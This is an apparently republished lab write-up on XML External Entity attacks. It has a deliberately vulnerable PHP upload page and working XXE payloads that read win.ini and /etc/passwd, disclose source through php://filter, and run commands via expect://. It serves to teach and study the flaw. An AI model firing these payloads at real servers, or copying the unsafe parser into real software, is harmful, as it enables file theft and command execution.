Lab - XML eXternal Entity Attack

前端之家收集整理的这篇文章主要介绍了Lab - XML eXternal Entity Attack前端之家小编觉得挺不错的,现在分享给大家,也给大家做个参考。

Prepare

Lab

Linux kali 3.14-kali1-686-pae

Requments

# apt-get install libapache2-mod-PHP5 PHP-xml-dtd PHP-xml-parser libexpect-PHP5

Demo Code

<html>                       
<body>                       
<h1>Process XML</h1>         

<form action="" method="post" enctype="multipart/form-data">
    <label for="file">Archive XML:</label>        
    <input type="file" name="file" id="file">
    <input type="submit" name="submit" value="submit"><br />
</form>                      
<hr>                           
<h1>Results</h1>             
<?PHP # error_reporting(E_ALL);  # ini_set("display_errors",1);  if ( isset($_FILES["file"]) ) { $doc = new DOMDocument(); $doc->validateOnParse = true; $doc->Load($_FILES["file"]["tmp_name"]); $tags = $doc->getElementsByTagName("data"); foreach($tags as $tag) { echo "<pre>" . $tag->nodeValue . "</pre>\n"; } } else { echo "invalid xml format"; } ?>                           

</body>                      
</html>

Exploit


Windows

File Inclusion

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE somexml[<!ENTITY message SYSTEM "file:///C:/Windows/win.ini">]>
<xxx>&message;</xxx>

Source Disclosure

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE somexml[<!ENTITY message SYSTEM "PHP://filter/read=convert.base64-encode/resource=C:/xampp/htdocs/recv.PHP">]>
<xxx>&message;</xxx>

Linux

File Inclusion

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE somexml [<!ENTITY hello SYSTEM "file:///etc/passwd">]>
<somexml><message>&hello;</message></somexml>

Source Disclosure

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE somexml [<!ENTITY hello SYSTEM "PHP://filter/read=convert.base64-encode/resource=/var/www/xxe.PHP">]>
<somexml><message>&hello;</message></somexml>

Command Execution

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE somexml [<!ENTITY hello SYSTEM "expect://dir">]>
<somexml><message>&hello;</message></somexml>

References

  1. https://pentesterlab.com/exercises/play_xxe
  2. http://blog.h3xstream.com/2014/06/identifying-xml-external-entity.html
  3. http://www.beneaththewaves.net/Software/On_The_Outside_Reaching_In.html
  4. http://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
  5. http://phpsecurity.readthedocs.org/en/latest/Injection-Attacks.html
  6. http://stackoverflow.com/questions/24117700/clarifications-on-xxe-vulnerabilities-throughout-php-versions

猜你在找的XML相关文章